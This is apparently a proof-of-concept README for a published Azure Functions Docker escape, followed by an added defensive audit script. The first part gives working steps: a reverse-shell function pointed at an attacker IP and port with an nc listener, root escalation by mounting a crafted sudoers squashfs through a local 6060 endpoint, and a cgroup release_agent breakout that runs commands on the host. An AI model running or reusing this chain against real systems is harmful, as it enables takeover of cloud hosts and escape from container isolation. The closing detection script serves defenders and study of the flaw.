For more details: https://www.intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/
In this POC we'll set up a reverse shell, use the squashfs file to escalate privileges in an Azure Function, and break out of the Docker environment.
- Install the Azure Functions CLI.
- Follow the Azure guide for setting up an Azure Function.
- Copy the files required for the POC to the function directory:

      cp files/__init__.py FUNCTIONDIR/FUNCTIONNAME/__init__.py
      cp files/sudoers.sqsh FUNCTIONDIR/

- Fill in the PORT and IP fields in the FUNCTIONDIR/FUNCTIONNAME/__init__.py file so they point to the server that will communicate with the reverse shell.
- Deploy the function (as in the guide above):

      func azure functionapp publish <APP_NAME>

- Listen on the reverse shell port (don't forget to whitelist this port on the firewall):

      nc -nlv 0.0.0.0 PORT

  and invoke the Function with the invocation URL you were given by the functionapp publish command.
- You should now be in the Azure Function. Escalate privileges:

      curl "localhost:6060/?operation=squashfs&filePath=/home/site/wwwroot/sudoers.sqsh&targetPath=/etc/sudoers.d"
      sudo su

- Finally, break out of the Docker container (in our example, we run ps on the Docker host):

      mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
      touch /output
      echo 1 > /tmp/cgrp/x/notify_on_release
      mount > /tmp/mtab
      host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /tmp/mtab`
      echo "$host_path/cmd" > /tmp/cgrp/release_agent
      echo '#!/bin/sh' > /cmd
      echo "ps aux >> $host_path/hostps" >> /cmd
      echo "ps aux >> $host_path/hostps2" >> /cmd
      chmod a+x /cmd
      sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
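
For defenders, the breakout step needs mount privileges (CAP_SYS_ADMIN) and leaves a cgroup v1 mount outside /sys/fs/cgroup plus a populated release_agent file. The script below is an added example, not part of the original POC, that audits for those three conditions; the function names and sample values are constructed for illustration.

```sh
#!/bin/sh
# Added example, not part of the original POC. Function names are illustrative.

CAP_SYS_ADMIN_BIT=21  # CAP_SYS_ADMIN in linux/capability.h; mount(2) requires it

# has_cap_sys_admin HEXMASK: succeed if a CapEff mask, as printed in
# /proc/<pid>/status, includes CAP_SYS_ADMIN.
has_cap_sys_admin() {
    [ $(( (0x$1 >> CAP_SYS_ADMIN_BIT) & 1 )) -eq 1 ]
}

# unexpected_cgroup_mounts: read a /proc/mounts-format table on stdin and print
# cgroup v1 mount points outside /sys/fs/cgroup (the POC mounts at /tmp/cgrp).
unexpected_cgroup_mounts() {
    awk '$3 == "cgroup" && $2 !~ /^\/sys\/fs\/cgroup(\/|$)/ { print $2 }'
}

# nonempty_release_agents ROOT: print each release_agent file under ROOT that
# has a value. cgroupfs reports size 0 for these files, so read the content.
nonempty_release_agents() {
    find "$1" -name release_agent -type f 2>/dev/null | while IFS= read -r f; do
        if [ -n "$(cat "$f" 2>/dev/null)" ]; then echo "$f"; fi
    done
}

# Constructed sample inputs, for illustration only.
SAMPLE_CAPEFF_DEFAULT=00000000a80425fb     # mask without CAP_SYS_ADMIN
SAMPLE_CAPEFF_PRIVILEGED=0000003fffffffff  # mask with every low bit set
SAMPLE_MOUNTS='cgroup /sys/fs/cgroup/rdma cgroup ro,nosuid,nodev,noexec,relatime,rdma 0 0
cgroup /tmp/cgrp cgroup rw,relatime,rdma 0 0
overlay / overlay rw,relatime 0 0'

# audit_self: run the three checks against the current container or host.
audit_self() {
    capeff=$(awk '/^CapEff:/ { print $2 }' /proc/self/status)
    if has_cap_sys_admin "$capeff"; then
        echo "WARN: CAP_SYS_ADMIN is effective (CapEff=$capeff)"
    fi
    unexpected_cgroup_mounts < /proc/mounts | sed 's/^/WARN: cgroup v1 mounted at /'
    nonempty_release_agents /sys/fs/cgroup | sed 's/^/WARN: release_agent set: /'
}

if [ "${1:-}" = "--audit" ]; then audit_self; fi
```

A release_agent value can be legitimate on some hosts, so compare findings against a known-good baseline before treating them as an incident.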